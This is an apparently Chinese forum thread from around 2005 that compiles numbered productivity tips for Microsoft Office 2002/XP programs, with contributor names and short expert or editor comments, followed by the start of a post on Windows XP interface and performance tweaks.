(4)单击“确定”按钮,此时Word的默认文件夹就指向用户自己设定的文件夹;
(5)最后单击“确定”按钮 ,完成设置工作

专家点评:
软件如何能做得比最好还好?,这似乎是一个很难的问题,其实答案很简单,那就是让用户自由地定制。正如Windows XP所言:“您可以随心所欲。”

42.在Excel公式和结果间切换的快捷键

姓名: 丁?亮
深圳市宝安区

在excel工作表中输入计算公式时,可以利用“Ctrl+`”键来决定显示或隐藏公式,可让储存格显示计算的结果,还是公式本身,每按一次就切换到"显示"或"隐藏" 这也许是您盼望已久的一个功能;也许您每次都是从“工具”-“选项”-“视图”-“窗口选项”-“公式”来切换的。

专家点评:
看看这个技巧吧!相信我,Excel真的很简单!

43.Excel 2002 小窍门: 快速隐藏选中单元格所在行和列

姓名:顾斌
江苏省南京市

在 Excel 中隐藏行或列, 通常可以通过格式菜单中的行或列选项中的隐藏来实现, 或者是选中行号或列标后通过鼠标右键的快捷菜单来完成, 对于分散的单元格区域, 可以这样快速隐藏:
快速隐藏选中单元格所在行:Ctrl + 9
快速隐藏选中单元格所在列:Ctrl + 0
注意:以上对于小键盘数字无效.

专家点评:
快捷键我们也介绍不少了。我想借着这个技巧再告诉您另一个重要的规律:在原有快捷键的基础上再加Shift就是相反*作的快捷键。例如:Ctrl+Shift+9就是取消行隐藏。
知道我们为什么喜欢推荐快捷键的技巧了吧:它一个顶俩

44.自制”快捷按钮
姓名:毕双喜
地址:安徽省宁国市
 

在EXCEL中,有时需把已合并的单元格取消合并。如果通过“格式-单元格-对齐”*作,费时费力。我们可以通过如下*作在工具栏建立快捷按钮,以备随时调用:

右击工具栏任一处,选择“自定义(C)…”;
选择“命令”标签,类别“格式”;
在命令中选择“取消合并”按钮,将其拖到工具栏合适位置;
关闭“自定义”窗口就可以使用了。
其他一些快捷键也可如上*作完成,如“增大/减小字号”、“冻结拆分窗口”等。

以上方法,WORD同样适用。

专家点评:
在Excel 2002中,格式工具栏中的“合并及居中”按钮已经变成了一个切换按钮,可以在合并居中和取消合并之间切换。但此技巧所提供的方法,是所有的Office程序中自定义工具栏按钮或菜单项的标准方式。

45.通过邮件传递,直接用自己的打印机打印他人需要打印的文件
姓名:姬学
地址:北京市海淀区

方法如下:

打开OUTLOOK的“工具”-“规则向导”-“新建”-“由空白规则开始”-“邮件到达时检查”-“下一步”;
选中“作动作标记”,点击此下划线,将“任何”二字删掉,此时便可输入您想添加的任何检测标记了。
将“输入要检测的标志”设为“请打印”,按“确定”-“下一步 ”;
在“如何处理该邮件”中选“打印”-“完成”。
这样,只要对方把需要打印的文件通过电子邮件发到您的机器上,您的打印机就可以无需您的*作,直接打印发来的文件了。

专家点评:
利用邮件规则实现文件的打印,对很多机构来说可能并没有太大的实际意义。但本技巧将二者结合的方法很有新意。也许可以启发您利用邮件规则满足更多的实际需求。

 

46.快速改变Word文档的行距
姓名:张甲寅
地址:北京市海淀区
 

选中你需要设置行距的文本段落,按“Ctrl+ 1”的组合键,即可将段落设置成单倍行距;按“Ctrl+ 2”的组合键,即可将段落设置成双倍行距;按“Ctrl+5”的组合键,即可将段落设置成1.5倍行距。
 

专家点评:
虽然简单,未必人人知道;虽然知道,未必在需要的时候能想得起来。好技巧未必很高深。

47.将Outlook最小化到系统托盘
姓名: 伍鹏
地址:重庆市渝中区

“HKEY_CURRENT_USER/Software/Microsoft/Office/10.0/Outlook/Preferences”,然后右击空白区域,新建一个DWORD值“MinToTray”,并设键值为1,做完这些步骤,你就可以最小化Outlook2002到系统托盘中了。
 

专家点评:
很有意思的技巧。不过各位在实验前请注意,确信自己已了解误改注册表所带来的严重后果,并确保已对现有的注册表进行了备份。
 

48.去除页眉的横线
姓名:杨冬华
地址:吉林省长春市

在页眉插入信息的时候经常会在下面出现一条横线,如果不想在页眉留下任何信息也无法自动去除此横线。这时可以采用下述的方法去掉:

确认插入点位于页眉
选取"格式"选项,选取"边框和底纹",边框设置选项选择"无","应用于"选择"段落",确定即可。
 
专家点评:
不知道是不是有人遇到过这种情况,万般无奈,只好把全部内容复制到另外一个空白文档中?千万不要错过这个技巧

49.MS Powerpoint的窗口播放模式
姓名:王玮
地址:浙江省杭州市

在实际使用Microsoft Powerpoint的演示文稿的过程中,往往需要与其他程序窗口

的数据配合使用以增强演示的效果,而默认的鼠标*作:点击Powerpoint的“幻灯片放 映”菜单中的“观看幻灯片”将启动默认的全屏放映模式,而在这种模式下,则必须使用Alt+Tab组合键或Alt+Esc键与其他窗口切换。然而,我们可以这样*作:在需要播放幻灯片时:按住Alt键不放,依次按下“D”,“V”键而激活播放*作,这时启动的 幻灯片放映模式是一个带标题栏和菜单栏的形式,这样就可以将此时的幻灯片播放模式 像一个普通窗口一样* 作,例如最小化和自定义大小。

50.在Excel中,实现在一个区域内的快速输入而不用使用鼠标来进行单元格之间的切换
姓名:吴哲锐
地址:上海市徐汇区

在Excel中,可以用以下方法实现在一个区域内的快速输入而不用使用鼠标来进行单元格之间的切换。方法如下:用鼠标圈定一定区域后,按Tab键可使目标单元格向后移,按Shift+Tab可向前移。这样就可以有键盘上连续输入一组数据而不需用鼠标,从而提高输入速度。

专家点评:
事实上,采用此方法最大的好处是,在一行的最后一个单元格,继续按Tab,则可以转到下一行开始的单元格;在选定区域最后一行的最后一个单元格继续按Tab则会回到选定区域第一行第一个单元格。同样用Enter可以按列输入数据。

51.Word小技巧:快速找到上次修改的位置
姓名:张锐建
地址:北京市海淀区

相信与我一样曾经处理过长文档的人都会有这种经历:一篇十几页或者上百页的文章进行编辑或较对时总要经过很多次修改,可是每次打开Word文档,想要从上次修改结束的位置接着修改时,总要找很久。终天有一天我找到一个快捷的方式,那就是“Shift+F5”快捷键,即在刚打开上次修改过的文档时,按下 “Shift键”的同时,按下“F5”键,输入光标会迅速跳到上次结束修改工作的位置,你很快就可以开始继续你的修改工作,实在是方便极了。

专家点评:
Microsoft Word 可以记录键入或编辑文字的最后三个位置。在保存了文档之后,仍可用此功能回到以前进行编辑的位置。

52.汉语拼音中的韵母输入方案:运用功能:word2000/xp中的自动更正功能
姓名:袁敏
地址:上海市

设置过程:

先新建文档,并输入(在插入-符号)所有带音标的汉语拼音韵母(此工作作为以后的复制粘贴之用)。
单击工具菜单,选择“自动更正”
去掉“英文句首字母大写”的钩。
先在替换栏中输入“`a1”,再在“替换为”栏中填入ā(复制粘贴),单击添加。这样就完成了替换过程。
依此类推,直至全部替换完,点击确定退出。
以后要输入的时候就可以直接输入“`a1”然后按空格键即可。
注:a1前的符号可以是任意的。

专家点评:
因Word中已包含了自动汉字拼音标注功能,故此技巧本身的实际意义已不大。但这是一个很好的启发。妙用“自动更正”,可以方便地输入工作中常用的词语、符号或图表。比如,标注英文单词的音标;让“myaddr”=我的地址、让“logo”=公司商标…;

53.暂停幻灯片演示的小窍门
姓名:李丹
地址:江西省南昌市

在播放幻灯片时,如果中场休息,或者插入其他话题,可以把幻灯片切换成黑屏或者
白屏而不推出播映,以便随时继续播映。

具体方法是按下w变成白屏,b变成黑屏。要继续播映只要按下空格键即可。

专家点评:
欲知更多快捷键信息,在播放时按下F1即可。

54.使用电子名片发送您的业务联系信息
Crystal K. Oldham,奥马哈, 内布拉维斯加州

Microsoft Outlook® 支持对电子名片的使用,电子名片是用于创建和共享虚拟名片的Internet标准。通过把一个电子名片添加到您的电子邮件签名中,就可以在您所发送的每一个电子邮件消息中包含您的业务联系信息。如果您收到了一个电子名片并且想把其中包含的信息保存起来,非常简单,双击它就可以做到这一点,而且它还将打开为一个联系人条目,您可以轻松地把它保存到您的联系人文件中。

在您的电子邮件中包含一个电子名片:

在工具菜单中点击“选项”,然后点击“邮件格式”标签
在签名下面点击“签名”,然后点击“新建”
选择您想要的选项,然后点击“下一步”
在“电子名片选项”下面,从列表中点击“电子名片”或者点击“从联系人新建电子名片”

55.在Word中自定义批注框文本
Maureen O'Donnell, 西雅图,华盛顿

我发现Microsoft Word 2002版本的文档中注释的默认设置有些太小。但可以很容易地改变字体和大小。您可以使用标准的格式化命令来修改您所打出的注释中的文本。

点击“格式”菜单中的“样式与格式”,它将在右边打开样式与格式任务窗格。
在任务窗格上的“请选择要应用的格式”下面,如果“批注框文本”条目可见,则转入第3步;如该条目不可见就继续下面的步骤:
在“显示”下拉菜单中点击“自定义”
在“格式设置”对话框中的“可见样式”下面,点击“批注框文本”,然后点击“确定”。
在“请选择要应用的格式”下面,用右键点击“批注框文本”条目,然后点击“更改”。
选择您想要的选项
要想看到更多选项,点击“格式”,然后点击您想要改变的属性。
在更改了每一个属性后点击“确定”。
对您想要更改的其他属性,重复5、6步。

56.用简单而强大的Excel函数创建一个时间表
Brian Nicholson, 沃特敦,威斯康星

Microsoft Excel提供了一种简单但功能强大的方式来收集雇员的时间表记录:NOW()函数。使用这个函数,您可以创建一个宏,它能让雇员通过点击按钮实现用打卡机记录上、下班时间。

录制一个能输入和更新NOW()函数的宏:

指向“工具”菜单中的宏,然后点击“录制新宏”
在“宏名”框中输入宏的名字,如"Timesheet"。
在“保存在”组合框中点击您想把该宏存储到的位置。如果您希望在任何时候您使用Exce时该宏都可用,请选择“个人宏工作簿”。
如果您想包含对该宏的说明,可以在“说明”框中输入对该宏的说明。
点击“确定”
在工作表中选中您想要在其中出现雇员的打卡上班时间的单元格,输入formula=Now(),然后按ENTER键。
拷贝该单元格。
用右键点击同一个单元格,然后在快捷菜单上点击“选择性粘贴”。在粘贴下面选中“数值”,然后点击“确定”。做完这些就可以冻结打卡上、下班的时间,使得雇员不能更改它。
按下ENTER键。
在“停止录制”工具栏上,点击“停止录制”。

创建一个自定义工具栏按钮,并把它指派给新宏:

点击“工具”菜单中的“自定义”,然后点击“命令”标签。
在“类别”框中点击“宏”。
把“自定义按钮”从“命令”框中拖到一个“工具栏”上。保持“自定义”对话框的打开状态,继续下列步骤:
右键点击新按钮,在快捷菜单的“命名”框中输入名字,例如“ClockInOut”
右键点击新按钮,指向快捷菜单中的“更改按钮图像”,然后点击一副图像。如果想显示按钮的名字而是图像,请点击“总是只用文字”。
右键点击新按钮,然后点击“指定宏”,在“宏名”下面点击您刚刚创建的宏的名字,然后点击“确定”。
关闭“自定义”对话框。
现在雇员所能做的就是选择一个合适的单元格,然后点击“ClockInOut”按钮。

56.在Excel中的绝对与相对单元引用之间切换
Rolando S. Jamilla,,Katy, 德克萨斯州

当您在Excel中创建一个公式时,该公式可以使用相对单元引用,即相对于公式所在的位置引用单元;也可以使用绝对单元引用,引用特定位置上的单元。公式还可以混合使用相对单元和绝对单元。绝对引用由$后跟符号表示,例如,$B$1是对第一行B列的绝对引用。

借助公式工作时,通过使用下面这个唾手可得的捷径,您可以轻松地将行和列的引用从相对引用改变到绝对引用,反之亦然。

选中包含公式的单元格。
在公式栏中选择您想要改变的引用。
按下F4切换。

57.在Word中调整表格的位置
Jennifer Matthey, 约翰斯敦, 宾夕法尼亚州

这是在Microsoft Word中重新定位表格的一个捷径

在页面视图中,把鼠标指针放在表格的左上角直到出现移动柄(框中有一个四个头的箭头)。
点击移动柄,用它把表格拖动到一个新位置。

编者注:要想得到页面视图,请点击“视图”菜单中的“页面”。

58.在Excel或Access中使用快捷方式插入时间/日期
Kimberly Schenk, 士麦那, 田纳西州

这里是一些键盘快捷方式,您可以用来在Access表格或Excel工作表中插入当前时间和日期

当前日期:按下CTRL+;

当前时间:按下CTRL+SHIFT+;

当前日期和时间:按下CTRL+;,打出一个空格,然后按下CTRL+SHIFT+;

编者注:当您使用这个技巧插入日期和时间时,所插入的信息是静态的。要想自动地更新信息,您必须使用TODAY和NOW函数。想学习怎样做到这一点,请在Excel帮助中查找“在单元格中插入当前日期和时间”,然后点击“插入会更新的日期和时间”。

59.使用双击修改项目符号和编号
Melissa Van Doren, 华盛顿, D.C.

您是否已经厌倦了寻找菜单命令来修改您的Word文档中的编号方案了呢?如果是,那就跳过菜单,转而使用快捷方式吧:

要想打开“项目符号与编号”对话框并调整编号方案,请双击编号列表中的一个编号。

60.在Excel中快速计算一个人的年龄
Kimberly Schenk,士麦那, 田纳西州

Excel中的DATEDIF() 函数可以计算两天之间的年、月或日数。因此,这个函数使得计算一个人的年龄变得容易了。 试用一下这个技巧吧:

在一个空白工作表中的A1单元里输入生日,用斜线分隔年、月和日。
在A2单元中输入type =DATEDIF(A1,TODAY(),"y") ,然后按ENTER。

这个人的年龄(以年表示)将被显示在A2单元中。

编者注:要想获得关于使用IF工作表函数的正确语法的更多信息,请查阅Excel帮助中的“IF 工作表函数”。

61.创建您自己的自定义Word模板
Souvik Das, 班加罗尔, 印度

如果您不喜欢Arial字体,并且不打算再次使用它,甚至是在使用Word 2002中撰写一个新文档时也是如此。那么您可以创建一个由您喜欢的字体风格和大小构成的模板并在您需要的时候随时使用它—这几乎和创建一个新文档一样容易。例如,您可以创建一个模板,其中的默认字体是Comic Sans,而不是Arial。

创建一个自定义模板:

在“视图”菜单中选取“任务窗格”。
如果“新建文档”任务窗格不可见,就从任务窗格右上角的下拉菜单中选取它。
在“新建文档”任务窗格中点击“通用模板”。
在出现的“模板”对话框中,选中“常用”标签并点击“空白文档”一次以选中它(这将成为您的新模板的基础)。
在“新建”部分选中“模板”,然后点击“确定”。
在新模板中添加任意您想在所有基于您的模板的文档中出现的文本和图形,并删除不想让其出现的项目。
把边框设定、页面大小和方向、风格及其它格式改为您想要的。例如,把字体改为Comic Sans。
点击“文件”菜单中的保存,给新模板起一个名字,然后点击“文件”->“关闭”。

您新创建的自定义模板将出现在新文档任务窗格的常用模板下面并可以使用。

62.指定Word中的句子间隔
Jennifer Matthey, 约翰斯敦, 宾夕法尼亚州

您可能喜欢在句子间使用一个或两个空格,Word能够帮助您确保单个文档内部以及从多个文档间的句子间隔均是一致的。您可以通过设定语法和风格的规则做到这一点。

点击“工具”菜单中的“选项”,然后点击拼写和语法标签。
点击“设置”。
在“所需风格”(Require)下面的“语法和风格选项”框中,为所需的句子间空格数选中您想要的选项。

要想恢复所选语法和写作风格的原始规则,请点击“全部重设”。

编者注:如果您正在为用一种非Word版本的语言所书写的文本设置选项,这些选项可能会有一些细小的变化。例如,一些组名可能会有所不同;其它一些组名,如“所需风格”,可能不存在。

63.缩减PowerPoint图片所占的空间
Daniel Jang,温哥华,加拿大

在添加图片,如照片或插图时,Microsoft PowerPoint?演示文稿可能会变得非常庞大。尽管您可以自己动手压缩图片,但这里有一个更为简单的方法:PowerPoint 2002将为您自动完成这一工作。

点击图片工具栏中的压缩图片按钮。如果看不到图片工具栏,请选择视图->工具栏->图片。
要想压缩演示文稿中的所有图片,请选中文档中的所有图片单选按钮。
在更改分辨率区域,选择演示文稿的使用目的:Web/屏幕或打印。
要想进一步削减文件的大小,请选中删除图片的剪裁区域复选框。
点击确定。
编者注:在执行了图片压缩或删除图片剪裁区域的*作后,您将不能把图片恢复至原先的分辨率或大小。该技巧同样适用于Microsoft Word 2002。

64.快速翻译您的Word文档
Parthasarathy Mandayam,Beaverton,俄勒冈州

在Word 2002中,您可以使用翻译任务窗格将单词、短语、甚至整篇文章翻译成另一种语言。要想打开翻译任务窗格,请选择工具->语言->翻译。

该工具具有以下功能:

在词典中查找单词或短语的翻译,必须在您的计算机上安装相应语言的词典。
将翻译后的文字直接从翻译任务窗格插入到文档中。
直接从翻译窗格中使用Internet上的翻译服务。如果您需要翻译一段比较长的文字,请在翻译窗格中点击通过Web翻译下的浏览按钮。
编者注:绝大多数语言(非英语或西欧语言)不属于Word标准安装的一部分。如果您需要使用该特性,请准备好您的Office XP安装光盘。

65.使用MapPoint向您的Word文档添加地图
Brian Lema,Nepean,安大略省

您知道吗?使用智能标记,您可以将Microsoft MapPoint?地图插入到Word 2002文档中。

在Word 2002文档中,在键入地址时,一个蓝色的小方框将作为智能标记指示器出现在该地址下。如果将鼠标指针移到这条虚线上,屏幕上将出现一个智能标记*作按钮。点击智能标记*作按钮,然后选择插入MapPoint地图。

编者注:如果您没有安装MapPoint软件,但与Web相连,您可以点击显示地图,系统将在Expedia.com上显示该地址的地图。

66.使用键盘快捷方式打开智能标记菜单
Robert Graff,Albuquerque,新墨西哥州

如果将智能标记配合键盘快捷方式使用,就可以节省许多时间。当您键入可被智能标记识别和标记的文字时,一个蓝色的小方框(智能标记指示器)将出现在该文字下方。使用箭头键,您可以将光标移到标记的文字上,然后按下ALT+SHIFT+F10。此时您就可以从*作菜单中选择所需的*作了。

67.在Word中修改您的自定义词典
Abhishek Sinha,德里,印度

您可能已经注意到这样一个事实:您可以将自己经常使用的单词添加到Word的自定义词典中(如姓名和缩写等)。但是,在将单词添加至词典后,您知道如何删除或编辑这些词吗?

在自定义词典中添加、删除或编辑单词的方法:

选择工具->选项,然后点击拼写和语法选项卡。
点击自定义词典。
选择您想要编辑的词典旁的选框。
点击修改。
然后完成以下*作:

要想添加新词汇,在词汇输入框中键入该词汇,然后点击添加。
要想删除某词汇,在词典框中选择该词汇,然后点击删除。
要想对某词汇进行编辑,在词典框中选中该词汇并对其进行修改,然后点击添加。删除掉错误拼写的词汇。

68.使用Outlook管理多个电子邮件帐户
Michael Feltner,杰克逊市,肯塔基州

Web电子邮件帐户(如MSN Hotmail)的好处在于,无论何时何地,只要能上网,您就可以访问到自己的电子邮件。但在另一方面,Web界面则大大降低了电子邮件管理的功能性和灵活性。

如果使用Outlook来存储和管理Web电子邮件,您就可以鱼和熊掌兼得了。在Outlook 2002的帮助之下,您可以轻松地访问到自己的Web邮件。方法如下:

点击工具菜单中的电子邮件帐户。
点击添加新电子邮件帐户,然后点击下一步。
点击HTTP,然后点击下一步。
添加您电子邮件帐户的信息(输入用户名和登录信息,选择邮件服务提供商),然后点击下一步。
点击完成结束帐户的设置工作。
现在,您的Web邮件帐户将以字母顺序显示在您的文件夹列表中。如果文件夹列表当前不可见,请点击视图菜单中的文件夹列表。

69.在Access中打印表关系图
Regina Fortuniewicz,Ossining,纽约州

正确设计的表和表之间的关系对于能否构建出良好的数据库非常关键。Microsoft Access 2002可以生成一个表关系图,帮助您评估数据库设计的良好与否。

点击工具菜单中的关系。
点击文件菜单中的打印关系。屏幕上将出现一张报表,显示了关系窗口中的关系。
保存或打印该报表,然后关闭报表窗口。
关闭关系窗口。

70.通过FrontPage了解网页的访问者
Brian Lema,Nepean,安大略省

通过了解站点访问者的特定信息,如访问者所用的*作系统、浏览器版本、连线速度等,可以很好地帮助您决定站点所用的技术和功能。Microsoft FrontPage 2002中的一个新特性可以帮助您收集这些重要的信息。方法如下:

点击插入菜单中的Web组件。
点击组件类型列表中的前10个列表。
在右侧的选择用途列表部分,点击需要跟踪的用户信息类型。
然后点击完成。
在列表设置框中输入列表的名称。
选择一种风格。
点击确定。
注意:以上技巧只在您的Web站点建立提供商(WPP)支持FrontPage 2002 Server Extensions时才有效。要想查看对FrontPage 2002提供完全支持的WPP列表,请访问查找Web站点建立提供商页面。

其他语言的拼写检查
Alexander Kovalevsky,所在地未知

有时,一个文档中可能包含多个语言的文字。因为Word只能使用一个词典,所以其他语言的文字将被标记为拼写错误。这里有一个检查这些拼写的快捷途径。

鼠标右击需要检查的文字,选择快捷菜单中的语言,然后您希望用作拼写检查的语言。现在,Word知道了应该使用哪个词典,您可以正常检查这些文字的拼写了。

编者注:要想使用多种语言的拼写检查,您必须启用希望使用的特定语言。欲知详情,请点击帮助菜单中的Microsoft Word帮助,搜索“语言”一词,然后选择“启用多语言编辑”主题。

71.在Outlook 2002中使用多个签名
Regina Fortuniewicz,Ossining,纽约州

在以前版本的Microsoft Outlook?中,您可以创建漂亮的签名并将其放在电子邮件的末尾。Outlook 2002进一步扩展了这一特性,现在,在答复和转发邮件时也可以添加签名了。您甚至可以为新邮件选择一个签名,为邮件答复选择另一个签名。方法如下:

点击工具菜单中的选项,然后点击邮件格式选项卡。
点击签名中的新邮件使用该签名下拉菜单,然后点击您希望使用的签名。
点击答复或转发时使用该签名下拉菜单,然后点击您希望使用的签名。
点击确定。
删除Outlook中窃取空间的文件
来自Jennifer Wood, Middleburg, 佛罗里达

我在支持帮助桌部门工作,我的这个技巧帮助我们减少了最常见的用户请求电话之一:邮箱容量超出了公司的限制。

当需要清理他们的邮箱时,大部分人都无法找到并删除占用最多空间的那些邮件,例如那些具有大附件的邮件。这里有一种快速的方法,能够发现那些隐藏在Microsoft Outlook?文件夹中的空间窃取者。

为了在Outlook中创建自定义的搜索文件:

在“工具”菜单中,点击“高级查找”,然后再点击“更多选择”选项卡。
在“查找”框中,点击“邮件”。
在“大小”列表中,点击“大于”,然后输入一个数字,例如500(查找那些500千字节(KB)以及更大的文件)。
根据您的需要选择剩下的搜索选项,然后点击“开始查找”。
在这个搜索完成后,您可以将它保存为一个快捷方式。*作方法是:点击“高级查找”对话框的“文件”菜单中的“保存搜索条件”,将它保存在任何您可以轻松找到它的地方,例如您的桌面。那么下次您需要再次运行这个搜索的时候,只需要双击这个快捷方式就可以了。

72.更改Access中控件的默认风格

来自 Lisa Friedrichsen, Overland Park, 堪萨斯

如果在设计Microsoft Access窗体时,您需要自定义您使用的文本框标签,那么这个技巧将告诉您如何去做。

在设计视图中打开一个窗体。
点击“工具箱”工具栏中的“文本框”工具。
为了打开这个文本框的属性窗体,请点击“窗体设计”工具栏中的“属性”。
在“自动标签”框中,点击“否”。
编者注:您可以使用同样的技术来更改所有控件的默认属性。

73.对您的日历进行颜色编码
来自 J. W. Lee, Spokane, 华盛顿州

在Outlook日历,您可以使用颜色来帮助您管理您的约会。例如,您可以为预定义的标签选择颜色,例如“个人”、“需要准备”或“必须参加”,或者您也可以创建您自己的标签。下面是*作方法:

为了给有预定义标签的约会或会议设置颜色:

点击日历。
在约会或会议上点击右键,指向快捷方式菜单的“标签”,然后在列表中点击一个颜色编码的标签。(为了删除一个约会或会议的颜色,请在“标签”列表中点击无。)

为了创建您自己的颜色标签:

点击日历。
在约会或会议上点击右键,指向快捷方式菜单的“标签”,然后点击“编辑标签”。
选择您需要重命名的颜色,输入新的标签名称,然后点击“确定”。

74.隔离来自未知来源的Email邮件
来自 Bobby Elliott, Erskine,宾夕法尼亚州

您是否希望阻止那些您不认识的人给您发的email邮件进入您的收件箱呢?您可以设置规则,将来自未知来源的邮件移到一个单独的文件夹中,然后在空闲的时候对这些信件进行挑选分类。

首先,在您的收件箱中创建一个新的文件夹,在这个文件夹中存放所有来自未知来源的邮件:

在文件夹列表中,右键点击“收件箱”,然后点击“新建文件夹”。(如果您无法看到文件夹列表,请点击“查看”菜单中的“文件夹列表”。)
输入这个文件夹的名称,例如未知发件人,然后点击“确定”。
然后使用规则向导创建一条新的规则:

在“工具”菜单中,点击“规则向导”。
点击“新建”,然后点击“从空白规则开始”。
点击“邮件到达时检查”,然后点击“下一步”。
在“想要检查何种条件”?对话框中,选择“只在本机上检测”复选框。
点击“下一步”。
在“如何处理该邮件”对话框中,点击“将邮件移动到指定的文件夹中”。
在“规则描述”框中,点击“指定”,然后点击您创建的文件夹(例如未知发件人),然后点击“确定”。
点击“下一步”。
在“添加例外规则”对话框中,选中“除非发件人在指定的通讯簿中”复选框。
在“规则描述”框中,点击“指定”。
在“添加地址列表”对话框中,选择“Outlook地址簿”,点击“添加”,然后点击“下一步”。
输入规则的名称,点击“完成”,然后点击“确定”。

75.使用文本框定位剪贴画
来自Tony Ramirez, Palm Bay, 佛罗里达

文本框是可移动、可改变大小的文本或图片容器。在Microsoft Word中,当您需要精确控制文档中剪贴画的位置时,您可以使用文本框。

在“绘图”工具栏中,点击“文本框”。
点击包含“在此处创建图形”的文本框边界,然后点击出现的文本框,并把它拖动到您希望定位图片的位置上。
要在文本框中添加剪贴画,请将光标放在其中,点击菜单栏中的“插入”,指向“图片”,然后点击“剪贴画”。
在“插入剪贴画”任务窗格中,使用搜索界面来选择您的剪贴画。
您可以使用“绘图”工具栏中的其他选项来改进一个文本框—例如更改填充的颜色—就和您可以对其他绘图对象做的一样。当使用文本框来显示图片时,请确保将文本框的线条颜色改为“无线条颜色”。

76.方便地访问您经常使用的文档
来自 Tony De Lucia, Lexington, 肯塔基

工作菜单是一个鲜为人知的重要Word特性。您可以使用工具菜单来保存常用Word文件的方便访问列表。

要将工作菜单添加到菜单栏或工具栏中:

在“工具”菜单中,点击“自定义”,然后点击“命令”选项卡。
在“类别”方框中,点击“内置菜单”。
点击“命令”方框中的“工作”,把它拖动到菜单栏或显示的工具栏中。
有了适当位置的工作菜单,您就可以将任意打开的Word文档添加到您的列表中。下面是所用的选项:

要将当前的文档添加到工作菜单中,请在“工作”菜单中,点击“添加到‘工作’菜单”。
要打开工作菜单中文档,请在“工作”菜单中,点击您希望打开的文档。
要从工作菜单中删除一个文档:
按CTRL+ALT+- (破折号键)。您的指针将变成大的粗体下划线。
在“工作”菜单中,点击您希望删除的文档。

77.演示过程中在幻灯片上书写
来自From Prashant Sood, Noida, 印度

作为一个演示人,您是否希望能够在幻灯片放映过程中在幻灯片上书写呢—例如画一个图表或在一个词下划线?Microsoft PowerPoint?包括了一个虚拟注释画笔,它使您能够在演示的同时在幻灯片上书写。

要在幻灯片放映过程中使用注释画笔:

在幻灯片放映视图中打开演示文稿。
在窗口中点击右键,指向“指针选项”,点击“绘图笔”。
画笔使用结束后,按ESC键。
编者注:在您离开这个幻灯片时,所有的注释画笔记号将全部消失,因此不要使用注释画笔来记录您以后要使用的注释。对于那些您希望保存的注释请使用会议记录或演讲者备注。

78.PowerPoint演示文稿的更多设计选项
来自 Stewart, 地址不祥

PowerPoint 2002的新特性之一就是您可以在单个演示文稿中使用多个幻灯片母版。幻灯片母版是存储信息的设计模版元素,包括风格、占位符和配色方案。有了这个特性,您就可以对演示文稿中的所有幻灯片做全面更改——例如替换一种字体风格。

在使用多个幻灯片母版时,请记住如果您要全面更改您的演示文稿,您需要改变每一个幻灯片母版。

要插入一个幻灯片母版:

在“视图”菜单中,指向“母版”,然后点击“幻灯片母版”。
执行下列步骤的其中之一:
要插入使用PowerPoint默认风格的幻灯片母版,在“幻灯片母版视图”工具栏中,点击“插入新幻灯片母版”。
要通过添加新的设计模版来插入幻灯片母版,在“格式”工具栏中,点击“设计”,指向您需要的设计,点击箭头,并在快捷方式菜单中选择其中的一个选项。
要替换或添加幻灯片母版:

在“视图”菜单中,指向“母版”,然后点击“幻灯片母版”。
在工具栏中点击“设计”。
如果您要替换演示文稿中的选定母版,而不是所有的母版,请在左侧的缩略图选择母版
在“幻灯片设计”任务窗格中,指向您需要的模版,点击箭头,然后执行下列步骤之一:
要使用新设计模版的母版替换所选定的母版,请点击“替换所选设计”。
要使用新设计模版的母版替换所有的当前母版,请点击“替换所有设计”。
要在演示文稿中添加新的设计模版和母版,请点击“添加设计方案”。
编者注:您正在使用的所有设计模版都将显示在“幻灯片设计”任务窗格的“在此演示文稿中使用”中。您可以在普通视图中将这些模版应用到幻灯片上。

79.快速清除所有的电子表格格式
来自Thomas Nilsson, Malm?, 瑞典

现在有一种方便的方法来快速的清除所有Microsoft Excel电子表格的格式。

在Excel 2002版中:

点击电子表格中的任一单元格,然后按CTRL+A,选择电子表格中的所有单元格。
在“编辑”菜单中,指向“清除”,然后点击“格式”。

80.创建最常用命令的菜单
来自Haroon Sheikh, Jalal-Pur-Jattan (Gujrat), 巴基斯坦

无论您使用哪一个Office XP程序,您都可以使得它们更好地为您服务。Word、Excel、PowerPoint和Outlook都为您提供了创建最常用命令的自定义菜单的选项。下面就是使用方法:

在“工具”菜单中,点击“自定义”,然后点击“命令”选项卡。
在“类别”方框中,点击“新菜单”,然后将“新菜单”从“命令”方框拖动到您希望显示这个菜单的菜单栏或工具栏位置。
在新菜单上点击右键,然后在快捷方式菜单的“名称”方框中输入您所希望的名称。按ENTER。
要在您的新菜单中添加一个命令,请在“类别”方框中选择一个类别,然后将命令从“命令”方框拖动到您的自定义菜单中。
鱼溺水而亡,是为了让大海能够记住他~
32楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:23   |  只看该作者   |  转账至  82622206

Windows XP鲜为人知的70招

一、Windows XP优化
恢复Windows经典界面
很多人安装了Windows XP后的第一感觉就是Windows变得漂亮极了。只是可惜美丽的代价要耗掉我们本就不富裕的内存和显存。要想恢复到和经典Windows类似的界面和使用习惯,请在桌面上单击鼠标右键,选择“属性”命令即可进入“显示属性”的设置窗口。这里共有“主题”、“桌面”、“屏幕保护程序”、“外观”和“设置”五个选项卡。在当前选项卡的标签上会有一条黄色的亮色突出显示,默认是“主题”选项卡,这里我们只要在“主题”的下拉选单里选择“Windows经典”,立即就可以在预览窗口看到显示效果,同时,外观选项卡的内容也会随之进行更改。
注意:Windows XP中“主题”和“外观”选项卡是息息相关的,只要更改其中的任何一个选项,在另一个选项卡中也会看到相应的改变。

恢复“开始”菜单
Windows XP新的“开始”菜单还是挺方便的,对系统资源的影响也不大。如果你喜欢过去的经典菜单的话,用鼠标右键单击任务栏空白处,选择“属性”菜单,进入“任务栏和开始菜单属性”的设置窗口,选择“[开始]菜单”选项卡,选择“经典[开始]菜单”即可恢复到从前的模样了。

优化视觉效果
Windows XP的操用界面的确是很好看,好看的背后是以消耗大量内存作为代价的,相对于速度和美观而言,我们还是宁愿选择前者,右键单击“我的电脑”,点击“属性/高级”,在“性能”一栏中,点击“设置/视觉效果”,在这里可以看到外观的所有设置,可以手工去掉一些不需要的功能。在这里把所有特殊的外观设置诸如淡入淡出、平滑滚动、滑动打开等所有视觉效果都关闭掉,我们就可以省下“一大笔”内存。

禁用多余的服务组件
